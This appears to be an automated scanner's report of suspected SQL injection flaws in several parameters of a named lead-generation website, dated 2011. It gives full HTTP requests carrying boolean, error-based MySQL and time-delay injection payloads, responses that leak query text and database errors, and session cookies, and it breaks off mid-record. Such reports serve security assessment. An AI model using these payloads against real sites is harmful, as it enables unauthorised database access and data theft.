The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 18190592'%20or%201%3d1--%20 and 18190592'%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:51:35 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=niupql1tielm44c7a4oieighu2; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 47440
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www.insideup.com/ppc/leadflow/"> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title> Compare Top Managed IP PBX Vendors, Use InsideUp to Get Quotes and Compare Top Providers of Managed VoIP Service </title> <meta name="description" content="Let Managed VoIP Providers Compete for Your PBX Needs. Compare Managed IP PBX Service from Leading Phone Solution Vendors "/> <meta name="keywords" content=" managed VoIP service, managed IP PBX, managed VoIP, managed PBX "/> <link rel="stylesheet" href="css/newlanding_style.css" /> <link rel="stylesheet" href="style/dhtmlwindow.css" /> <link rel="stylesheet" href="css/ui.core.css" /> <link rel="stylesheet" href="css/Dyn_form_style.css" /> <script type="text/javascript" src='js/jquery.js'></script> <script type="text/javascript" src="js/ui.core.js"></script> <script type="text/javascript"> jQuery(document).ready(function() { jQuery("form").attr("autocomplete", "off"); }); var global_form_attribute = 8 </script>
The address parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the address parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address'&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:41:52 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 10118
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... (97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'loan&attributeId_430=2792__$15,000 - 24,999&attributeId_431=2801__A business tha' at line 5
Request 2
GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address''&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:41:52 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 9941
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]...
The address parameter appears to be vulnerable to SQL injection attacks. The payloads 96573606'%20or%201%3d1--%20 and 96573606'%20or%201%3d2--%20 were each submitted in the address parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:36:49 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=tltqnuvtrnu6gd83890sthugk4; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 47440
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]... <title> Compare Top Managed IP PBX Vendors, Use InsideUp to Get Quotes and Compare Top Providers of Managed VoIP Service </title> <meta name="description" content="Let Managed VoIP Providers Compete for Your PBX Needs. Compare Managed IP PBX Service from Leading Phone Solution Vendors "/> <meta name="keywords" content=" managed VoIP service, managed IP PBX, managed VoIP, managed PBX "/> <link rel="stylesheet" href="css/newlanding_style.css" /> <link rel="stylesheet" href="style/dhtmlwindow.css" /> <link rel="stylesheet" href="css/ui.core.css" /> <link rel="stylesheet" href="css/Dyn_form_style.css" /> <script type="text/javascript" src='js/jquery.js'></script> <script type="text/javascript" src="js/ui.core.js"></script> <script type="text/javascript"> jQuery(document).ready(function() { jQuery("form").attr("autocomplete", "off"); }); var global_form_attribute = 8 </script>
The address parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the address parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:19:10 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8326
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... rcard&attributeId_529=SELECT pg_sleep(25)--&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'loan&attributeId_430=2792__$15,000 - 24,999&attributeId_431=2801__A business tha' at line 5
The attributeId_342_g parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_342_g parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:20:55 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8326
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... rcard&attributeId_529=SELECT pg_sleep(25)--&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'loan&attributeId_430=2792__$15,000 - 24,999&attributeId_431=2801__A business tha' at line 5
The attributeId_342_g parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_342_g parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance'&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:41:57 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 10118
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... (97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'loan&attributeId_430=2792__$15,000 - 24,999&attributeId_431=2801__A business tha' at line 5
Request 2
GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance''&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:41:58 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 9941
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]...
The attributeId_342_g parameter appears to be vulnerable to SQL injection attacks. The payloads 20219497'%20or%201%3d1--%20 and 20219497'%20or%201%3d2--%20 were each submitted in the attributeId_342_g parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:37:36 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=uen32g3vfhfivntuav244d95q2; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 47440
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]... <title> Compare Top Managed IP PBX Vendors, Use InsideUp to Get Quotes and Compare Top Providers of Managed VoIP Service </title> <meta name="description" content="Let Managed VoIP Providers Compete for Your PBX Needs. Compare Managed IP PBX Service from Leading Phone Solution Vendors "/> <meta name="keywords" content=" managed VoIP service, managed IP PBX, managed VoIP, managed PBX "/> <link rel="stylesheet" href="css/newlanding_style.css" /> <link rel="stylesheet" href="style/dhtmlwindow.css" /> <link rel="stylesheet" href="css/ui.core.css" /> <link rel="stylesheet" href="css/Dyn_form_style.css" /> <script type="text/javascript" src='js/jquery.js'></script> <script type="text/javascript" src="js/ui.core.js"></script> <script type="text/javascript"> jQuery(document).ready(function() { jQuery("form").attr("autocomplete", "off"); }); var global_form_attribute = 8 </script>
The attributeId_343_g parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_343_g parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:21:51 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8326
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... rcard&attributeId_529=SELECT pg_sleep(25)--&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'loan&attributeId_430=2792__$15,000 - 24,999&attributeId_431=2801__A business tha' at line 5
The attributeId_343_g parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_343_g parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9'&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:42:00 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 10118
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... (97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'loan&attributeId_430=2792__$15,000 - 24,999&attributeId_431=2801__A business tha' at line 5
Request 2
GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9''&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:42:01 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 9941
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]...
The attributeId_344_g parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_344_g parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
